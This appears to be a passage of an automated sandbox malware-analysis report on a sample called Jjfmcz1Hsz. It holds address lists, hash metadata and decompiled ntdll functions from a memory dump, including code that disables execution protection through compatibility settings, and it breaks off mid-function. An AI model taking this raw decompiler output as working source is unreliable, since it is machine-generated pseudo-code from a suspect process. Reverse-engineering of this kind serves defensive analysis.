                                                                                                                                                                            0x1d825df3
                                                                                                                                                                            0x1d825e00
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825e08
                                                                                                                                                                            0x1d825eec
                                                                                                                                                                            0x1d825eef
                                                                                                                                                                            0x1d8809f9
                                                                                                                                                                            0x1d880a00
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d880a06
                                                                                                                                                                            0x1d825ef7
                                                                                                                                                                            0x1d825f00
                                                                                                                                                                            0x1d825e29
                                                                                                                                                                            0x1d825e29
                                                                                                                                                                            0x1d825e2c
                                                                                                                                                                            0x1d825e34
                                                                                                                                                                            0x1d825e38
                                                                                                                                                                            0x1d825e3a
                                                                                                                                                                            0x1d825e40
                                                                                                                                                                            0x1d825e42
                                                                                                                                                                            0x1d825e4e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825e58
                                                                                                                                                                            0x1d825e58
                                                                                                                                                                            0x1d825e5e
                                                                                                                                                                            0x1d825e66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825e6c
                                                                                                                                                                            0x1d825e4e
                                                                                                                                                                            0x1d825e0e
                                                                                                                                                                            0x1d825e0e
                                                                                                                                                                            0x1d825e21
                                                                                                                                                                            0x1d825e23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825e23
                                                                                                                                                                            0x1d825de0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825d9e
                                                                                                                                                                            0x1d825eda
                                                                                                                                                                            0x1d825ee0
                                                                                                                                                                            0x1d825f53
                                                                                                                                                                            0x1d825f59
                                                                                                                                                                            0x1d82602d
                                                                                                                                                                            0x1d826033
                                                                                                                                                                            0x1d826035
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d826035
                                                                                                                                                                            0x1d825f5f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825f5f
                                                                                                                                                                            0x1d825ee2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825ee2
                                                                                                                                                                            0x1d825c04
                                                                                                                                                                            0x1d825c0a
                                                                                                                                                                            0x1d825c0b
                                                                                                                                                                            0x1d825c11
                                                                                                                                                                            0x1d825c1a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825c24
                                                                                                                                                                            0x1d826047
                                                                                                                                                                            0x1d82604c
                                                                                                                                                                            0x1d82604c
                                                                                                                                                                            0x1d825c2a
                                                                                                                                                                            0x1d825c30
                                                                                                                                                                            0x1d825c3a
                                                                                                                                                                            0x1d825c40
                                                                                                                                                                            0x1d825c4c
                                                                                                                                                                            0x1d825c52
                                                                                                                                                                            0x1d825c5f
                                                                                                                                                                            0x1d825c68
                                                                                                                                                                            0x1d825c71
                                                                                                                                                                            0x1d825c7a
                                                                                                                                                                            0x1d825c7d
                                                                                                                                                                            0x1d825c85
                                                                                                                                                                            0x1d825c9e
                                                                                                                                                                            0x1d825ca1
                                                                                                                                                                            0x1d825ca7
                                                                                                                                                                            0x1d825cad
                                                                                                                                                                            0x1d825cba
                                                                                                                                                                            0x1d88087c
                                                                                                                                                                            0x1d825cc0
                                                                                                                                                                            0x1d825cc0
                                                                                                                                                                            0x1d825cc0
                                                                                                                                                                            0x1d825cc4
                                                                                                                                                                            0x1d880886
                                                                                                                                                                            0x1d880889
                                                                                                                                                                            0x1d880889
                                                                                                                                                                            0x1d825cd1
                                                                                                                                                                            0x1d880897
                                                                                                                                                                            0x1d880897
                                                                                                                                                                            0x1d825cf0
                                                                                                                                                                            0x1d8808a2
                                                                                                                                                                            0x1d8808a2
                                                                                                                                                                            0x1d825cf6
                                                                                                                                                                            0x1d825cfc
                                                                                                                                                                            0x1d825d09
                                                                                                                                                                            0x1d8808ae
                                                                                                                                                                            0x1d8808ae
                                                                                                                                                                            0x1d825d0f
                                                                                                                                                                            0x1d825d15
                                                                                                                                                                            0x1d825d22
                                                                                                                                                                            0x1d8808ba
                                                                                                                                                                            0x1d8808ba
                                                                                                                                                                            0x1d825d22
                                                                                                                                                                            0x1d825d28
                                                                                                                                                                            0x1d825d2f
                                                                                                                                                                            0x1d825d37
                                                                                                                                                                            0x1d825d39
                                                                                                                                                                            0x1d825d40
                                                                                                                                                                            0x1d825d47
                                                                                                                                                                            0x1d825f41
                                                                                                                                                                            0x1d825f47
                                                                                                                                                                            0x1d825fc2
                                                                                                                                                                            0x1d825fc8
                                                                                                                                                                            0x1d825f49
                                                                                                                                                                            0x1d825f49
                                                                                                                                                                            0x1d825f49
                                                                                                                                                                            0x1d825d4d
                                                                                                                                                                            0x1d825d4d
                                                                                                                                                                            0x1d825d4d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825d47
                                                                                                                                                                            0x1d825be7
                                                                                                                                                                            0x1d825e7f
                                                                                                                                                                            0x1d825baf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825baf
                                                                                                                                                                            0x1d825ba1
                                                                                                                                                                            0x1d825a46
                                                                                                                                                                            0x1d825a4b
                                                                                                                                                                            0x1d825a52
                                                                                                                                                                            0x1d825a5f
                                                                                                                                                                            0x1d825a64
                                                                                                                                                                            0x1d825a6b
                                                                                                                                                                            0x1d825a71
                                                                                                                                                                            0x1d825a76
                                                                                                                                                                            0x1d880772
                                                                                                                                                                            0x1d826068
                                                                                                                                                                            0x1d826073
                                                                                                                                                                            0x1d826073
                                                                                                                                                                            0x1d825a7c
                                                                                                                                                                            0x1d825a82
                                                                                                                                                                            0x1d825a88
                                                                                                                                                                            0x1d825a8e
                                                                                                                                                                            0x1d825a92
                                                                                                                                                                            0x1d825a95
                                                                                                                                                                            0x1d825a9c
                                                                                                                                                                            0x1d825aa3
                                                                                                                                                                            0x1d825ab6
                                                                                                                                                                            0x1d825abb
                                                                                                                                                                            0x1d825abe
                                                                                                                                                                            0x1d825ac5
                                                                                                                                                                            0x1d825ace
                                                                                                                                                                            0x1d825ad1
                                                                                                                                                                            0x1d825ad3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825ad3
                                                                                                                                                                            0x1d8259fe
                                                                                                                                                                            0x1d825a01
                                                                                                                                                                            0x1d825a07
                                                                                                                                                                            0x1d825a08
                                                                                                                                                                            0x1d825a0d
                                                                                                                                                                            0x1d825a15
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d825a1b
                                                                                                                                                                            0x1d825a1e
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @
                                                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                                                            • Opcode ID: 8963079ca2ef5b49d3c7ba25e87301a4159d42d21cb63af5bf171beb7a9898e0
                                                                                                                                                                            • Instruction ID: 4a3523a8ce3ce63a0105188f0d9e2c453b0ccf89a87ab111559f7bd0cb7714df
                                                                                                                                                                            • Opcode Fuzzy Hash: 8963079ca2ef5b49d3c7ba25e87301a4159d42d21cb63af5bf171beb7a9898e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 80324A74D44269DFDB21CF68C984BE9BBB0BB08314F4080E9E54AA7651D7746AC4CFA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID: HEAP:
                                                                                                                                                                            • API String ID: 3446177414-2466845122
                                                                                                                                                                            • Opcode ID: e89035e292be8be4f6fb484ea4da259a0765304ec9948a0dbb08fedfdb29bb4f
                                                                                                                                                                            • Instruction ID: cbb108c99348381daa5a3345f7aca97c28bdd16081cfb7c7071a3edf2b1cc6df
                                                                                                                                                                            • Opcode Fuzzy Hash: e89035e292be8be4f6fb484ea4da259a0765304ec9948a0dbb08fedfdb29bb4f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2FA18971A082168FC705CF28C894A2BB7E6BF88B64F15456DE946DB360E770EC45CB92
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                            			E1D857550(void* __ecx) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v548;
                                                                                                                                                                            				unsigned int _v552;
                                                                                                                                                                            				unsigned int _v556;
                                                                                                                                                                            				unsigned int _v560;
                                                                                                                                                                            				char _v564;
                                                                                                                                                                            				char _v568;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				unsigned int _t49;
                                                                                                                                                                            				signed char _t53;
                                                                                                                                                                            				unsigned int _t55;
                                                                                                                                                                            				unsigned int _t56;
                                                                                                                                                                            				unsigned int _t65;
                                                                                                                                                                            				unsigned int _t66;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				unsigned int _t73;
                                                                                                                                                                            				unsigned int _t77;
                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                            				char* _t98;
                                                                                                                                                                            				unsigned int _t102;
                                                                                                                                                                            				signed int _t103;
                                                                                                                                                                            				void* _t105;
                                                                                                                                                                            				signed int _t107;
                                                                                                                                                                            				void* _t108;
                                                                                                                                                                            				void* _t110;
                                                                                                                                                                            				void* _t111;
                                                                                                                                                                            				void* _t112;
                                                                                                                                                                            
                                                                                                                                                                            				_t45 =  *0x1d91b370 ^ _t107;
                                                                                                                                                                            				_v8 =  *0x1d91b370 ^ _t107;
                                                                                                                                                                            				_t105 = __ecx;
                                                                                                                                                                            				if( *0x1d916664 == 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					return E1D864B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t85 = 0;
                                                                                                                                                                            				E1D82E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
                                                                                                                                                                            				if(( *0x7ffe02d5 & 0x00000003) == 0) {
                                                                                                                                                                            					_t45 = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t45 =  *(_v564 + 0x5f) & 0x00000001;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                            					_v556 = _t85;
                                                                                                                                                                            					_t49 = E1D857738(_t105);
                                                                                                                                                                            					__eflags = _t49;
                                                                                                                                                                            					if(_t49 != 0) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t103 = 2;
                                                                                                                                                                            						_v556 = _t103;
                                                                                                                                                                            						L10:
                                                                                                                                                                            						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
                                                                                                                                                                            						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
                                                                                                                                                                            							_t45 = 1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t53 = E1D85763B(_v564);
                                                                                                                                                                            							asm("sbb al, al");
                                                                                                                                                                            							_t45 =  ~_t53 + 1;
                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t45;
                                                                                                                                                                            						if(_t45 == 0) {
                                                                                                                                                                            							_t102 = _t103 | 0x00000040;
                                                                                                                                                                            							_v556 = _t102;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t102;
                                                                                                                                                                            						if(_t102 != 0) {
                                                                                                                                                                            							L33:
                                                                                                                                                                            							_push(4);
                                                                                                                                                                            							_push( &_v556);
                                                                                                                                                                            							_push(0x22);
                                                                                                                                                                            							_push(0xffffffff);
                                                                                                                                                                            							_t45 = E1D862B70();
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L4;
                                                                                                                                                                            					}
                                                                                                                                                                            					_v552 = _t85;
                                                                                                                                                                            					_t102 =  &_v552;
                                                                                                                                                                            					_t55 = E1D8576ED(_t105 + 0x2c, _t102);
                                                                                                                                                                            					__eflags = _t55;
                                                                                                                                                                            					if(_t55 >= 0) {
                                                                                                                                                                            						__eflags = _v552 - _t85;
                                                                                                                                                                            						if(_v552 == _t85) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t85 = _t105 + 0x24;
                                                                                                                                                                            						E1D8AEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
                                                                                                                                                                            						_v560 = 0x214;
                                                                                                                                                                            						E1D868F40( &_v548, 0, 0x214);
                                                                                                                                                                            						_t106 =  *0x1d916664;
                                                                                                                                                                            						_t110 = _t108 + 0x20;
                                                                                                                                                                            						 *0x1d9191e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
                                                                                                                                                                            						_t65 =  *((intOrPtr*)( *0x1d916664))();
                                                                                                                                                                            						__eflags = _t65;
                                                                                                                                                                            						if(_t65 == 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t66 = _v560;
                                                                                                                                                                            						__eflags = _t66;
                                                                                                                                                                            						if(_t66 == 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags = _t66 - 0x214;
                                                                                                                                                                            						if(_t66 >= 0x214) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t68 = (_t66 >> 1) * 2 - 2;
                                                                                                                                                                            						__eflags = _t68 - 0x214;
                                                                                                                                                                            						if(_t68 >= 0x214) {
                                                                                                                                                                            							E1D864C68();
                                                                                                                                                                            							goto L33;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                            						 *((short*)(_t107 + _t68 - 0x220)) = 0;
                                                                                                                                                                            						E1D8AEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
                                                                                                                                                                            						_t111 = _t110 + 0x14;
                                                                                                                                                                            						_t73 = E1D86A9C0( &_v548, L"Execute=1");
                                                                                                                                                                            						_push(_t85);
                                                                                                                                                                            						__eflags = _t73;
                                                                                                                                                                            						if(_t73 == 0) {
                                                                                                                                                                            							E1D8AEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
                                                                                                                                                                            							_t106 =  &_v548;
                                                                                                                                                                            							_t98 =  &_v548;
                                                                                                                                                                            							_t112 = _t111 + 0x14;
                                                                                                                                                                            							_t77 = _v560 + _t98;
                                                                                                                                                                            							_v552 = _t77;
                                                                                                                                                                            							__eflags = _t98 - _t77;
                                                                                                                                                                            							if(_t98 >= _t77) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            							do {
                                                                                                                                                                            								L27:
                                                                                                                                                                            								_t85 = E1D86A690(_t106, 0x20);
                                                                                                                                                                            								__eflags = _t85;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                            									 *_t85 = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            								E1D8AEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
                                                                                                                                                                            								_t112 = _t112 + 0x10;
                                                                                                                                                                            								E1D89CC1E(_t105, _t106, __eflags);
                                                                                                                                                                            								__eflags = _t85;
                                                                                                                                                                            								if(_t85 == 0) {
                                                                                                                                                                            									goto L8;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t41 = _t85 + 2; // 0x2
                                                                                                                                                                            								_t106 = _t41;
                                                                                                                                                                            								__eflags = _t106 - _v552;
                                                                                                                                                                            							} while (_t106 < _v552);
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                            						_push(3);
                                                                                                                                                                            						_push(0x55);
                                                                                                                                                                            						E1D8AEF10();
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					L8:
                                                                                                                                                                            					_t56 = E1D857648(_t105);
                                                                                                                                                                            					__eflags = _t56;
                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t103 = _v556;
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































                                                                                                                                                                            0x1d857560
                                                                                                                                                                            0x1d857562
                                                                                                                                                                            0x1d85756f
                                                                                                                                                                            0x1d857571
                                                                                                                                                                            0x1d8575ab
                                                                                                                                                                            0x1d8575b9
                                                                                                                                                                            0x1d8575b9
                                                                                                                                                                            0x1d857579
                                                                                                                                                                            0x1d857583
                                                                                                                                                                            0x1d85758f
                                                                                                                                                                            0x1d894443
                                                                                                                                                                            0x1d857595
                                                                                                                                                                            0x1d85759e
                                                                                                                                                                            0x1d85759e
                                                                                                                                                                            0x1d8575a2
                                                                                                                                                                            0x1d8575bc
                                                                                                                                                                            0x1d8575c2
                                                                                                                                                                            0x1d8575c7
                                                                                                                                                                            0x1d8575c9
                                                                                                                                                                            0x1d857621
                                                                                                                                                                            0x1d857623
                                                                                                                                                                            0x1d857624
                                                                                                                                                                            0x1d8575f8
                                                                                                                                                                            0x1d8575ff
                                                                                                                                                                            0x1d857601
                                                                                                                                                                            0x1d85762c
                                                                                                                                                                            0x1d857603
                                                                                                                                                                            0x1d857609
                                                                                                                                                                            0x1d857610
                                                                                                                                                                            0x1d857612
                                                                                                                                                                            0x1d857612
                                                                                                                                                                            0x1d857612
                                                                                                                                                                            0x1d857614
                                                                                                                                                                            0x1d857616
                                                                                                                                                                            0x1d857630
                                                                                                                                                                            0x1d857633
                                                                                                                                                                            0x1d857633
                                                                                                                                                                            0x1d857618
                                                                                                                                                                            0x1d85761a
                                                                                                                                                                            0x1d8945c9
                                                                                                                                                                            0x1d8945c9
                                                                                                                                                                            0x1d8945d1
                                                                                                                                                                            0x1d8945d2
                                                                                                                                                                            0x1d8945d4
                                                                                                                                                                            0x1d8945d6
                                                                                                                                                                            0x1d8945d6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d85761a
                                                                                                                                                                            0x1d8575ce
                                                                                                                                                                            0x1d8575d4
                                                                                                                                                                            0x1d8575da
                                                                                                                                                                            0x1d8575df
                                                                                                                                                                            0x1d8575e1
                                                                                                                                                                            0x1d89444a
                                                                                                                                                                            0x1d894450
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d894456
                                                                                                                                                                            0x1d894469
                                                                                                                                                                            0x1d894476
                                                                                                                                                                            0x1d894486
                                                                                                                                                                            0x1d89448b
                                                                                                                                                                            0x1d894497
                                                                                                                                                                            0x1d8944b9
                                                                                                                                                                            0x1d8944bf
                                                                                                                                                                            0x1d8944c1
                                                                                                                                                                            0x1d8944c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8944c9
                                                                                                                                                                            0x1d8944cf
                                                                                                                                                                            0x1d8944d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8944dc
                                                                                                                                                                            0x1d8944de
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8944e6
                                                                                                                                                                            0x1d8944ed
                                                                                                                                                                            0x1d8944ef
                                                                                                                                                                            0x1d8945c4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8945c4
                                                                                                                                                                            0x1d8944f7
                                                                                                                                                                            0x1d8944f8
                                                                                                                                                                            0x1d894510
                                                                                                                                                                            0x1d894515
                                                                                                                                                                            0x1d894524
                                                                                                                                                                            0x1d89452b
                                                                                                                                                                            0x1d89452c
                                                                                                                                                                            0x1d89452e
                                                                                                                                                                            0x1d894556
                                                                                                                                                                            0x1d894561
                                                                                                                                                                            0x1d894567
                                                                                                                                                                            0x1d894569
                                                                                                                                                                            0x1d89456c
                                                                                                                                                                            0x1d89456e
                                                                                                                                                                            0x1d894574
                                                                                                                                                                            0x1d894576
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89457c
                                                                                                                                                                            0x1d89457c
                                                                                                                                                                            0x1d894584
                                                                                                                                                                            0x1d894588
                                                                                                                                                                            0x1d89458a
                                                                                                                                                                            0x1d89458c
                                                                                                                                                                            0x1d89458e
                                                                                                                                                                            0x1d89458e
                                                                                                                                                                            0x1d89459b
                                                                                                                                                                            0x1d8945a0
                                                                                                                                                                            0x1d8945a7
                                                                                                                                                                            0x1d8945ac
                                                                                                                                                                            0x1d8945ae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8945b4
                                                                                                                                                                            0x1d8945b4
                                                                                                                                                                            0x1d8945b7
                                                                                                                                                                            0x1d8945b7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8945bf
                                                                                                                                                                            0x1d894530
                                                                                                                                                                            0x1d894535
                                                                                                                                                                            0x1d894537
                                                                                                                                                                            0x1d894539
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d89453e
                                                                                                                                                                            0x1d8575e7
                                                                                                                                                                            0x1d8575e9
                                                                                                                                                                            0x1d8575ee
                                                                                                                                                                            0x1d8575f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8575f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8575a4
                                                                                                                                                                            0x1d8575a4
                                                                                                                                                                            0x1d8575a4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8575a4

                                                                                                                                                                            Strings
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1D894460
                                                                                                                                                                            • Execute=1, xrefs: 1D89451E
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1D89454D
                                                                                                                                                                            • ExecuteOptions, xrefs: 1D8944AB
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1D894507
                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 1D894592
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1D894530
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 7847107026aabe9e39d0490cfaf5da27757a5501ec00885511d4f80b31e8a29a
                                                                                                                                                                            • Instruction ID: 4251bde37fc37499d812970bfebb0d96f0102aecb35620c94e83c3f2612a5665
                                                                                                                                                                            • Opcode Fuzzy Hash: 7847107026aabe9e39d0490cfaf5da27757a5501ec00885511d4f80b31e8a29a
                                                                                                                                                                            • Instruction Fuzzy Hash: 81512A31A04219BADF11AAA8DC95FFD73A9EF48310F0145E9E609A7191E730AA41CB62
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 48%
                                                                                                                                                                            			E1D83A170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				signed char _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				char _v36;
                                                                                                                                                                            				char _v40;
                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                            				char _v48;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				char _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				char _v64;
                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                            				void* _v72;
                                                                                                                                                                            				void* _v76;
                                                                                                                                                                            				void* _v80;
                                                                                                                                                                            				void* _v84;
                                                                                                                                                                            				void* _v85;
                                                                                                                                                                            				void* _v88;
                                                                                                                                                                            				void* _v96;
                                                                                                                                                                            				void* _v109;
                                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                                            				void* _t129;
                                                                                                                                                                            				intOrPtr* _t130;
                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                            				void* _t136;
                                                                                                                                                                            				intOrPtr _t145;
                                                                                                                                                                            				intOrPtr _t151;
                                                                                                                                                                            				intOrPtr* _t164;
                                                                                                                                                                            				intOrPtr _t165;
                                                                                                                                                                            				signed int _t166;
                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                            				intOrPtr _t173;
                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                            				intOrPtr _t178;
                                                                                                                                                                            				intOrPtr _t181;
                                                                                                                                                                            				void* _t190;
                                                                                                                                                                            				intOrPtr* _t191;
                                                                                                                                                                            				intOrPtr _t201;
                                                                                                                                                                            				signed int _t202;
                                                                                                                                                                            				void* _t203;
                                                                                                                                                                            				signed char _t213;
                                                                                                                                                                            				intOrPtr _t214;
                                                                                                                                                                            				intOrPtr _t217;
                                                                                                                                                                            				signed int _t219;
                                                                                                                                                                            				signed int _t224;
                                                                                                                                                                            				intOrPtr _t228;
                                                                                                                                                                            				intOrPtr _t229;
                                                                                                                                                                            				signed int _t234;
                                                                                                                                                                            				void* _t236;
                                                                                                                                                                            				signed int _t240;
                                                                                                                                                                            				void* _t242;
                                                                                                                                                                            
                                                                                                                                                                            				_t178 =  *[fs:0x18];
                                                                                                                                                                            				_t242 = (_t240 & 0xfffffff8) - 0x3c;
                                                                                                                                                                            				_t128 =  *((intOrPtr*)(_t178 + 0x30));
                                                                                                                                                                            				if( *((intOrPtr*)(_t128 + 0x1f8)) == 0) {
                                                                                                                                                                            					if( *((intOrPtr*)(_t128 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x1a8)))) != 0) {
                                                                                                                                                                            						goto L1;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t129 = 0xc0150001;
                                                                                                                                                                            						goto L33;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                            					_v36 = 0xffffffff;
                                                                                                                                                                            					_v40 = 0;
                                                                                                                                                                            					if(_a16 == 0) {
                                                                                                                                                                            						L83:
                                                                                                                                                                            						_t129 = 0xc000000d;
                                                                                                                                                                            						goto L33;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t213 = _a4;
                                                                                                                                                                            						if((_t213 & 0xfffffff8) != 0) {
                                                                                                                                                                            							goto L83;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t130 = _a20;
                                                                                                                                                                            							if((_t213 & 0x00000007) == 0) {
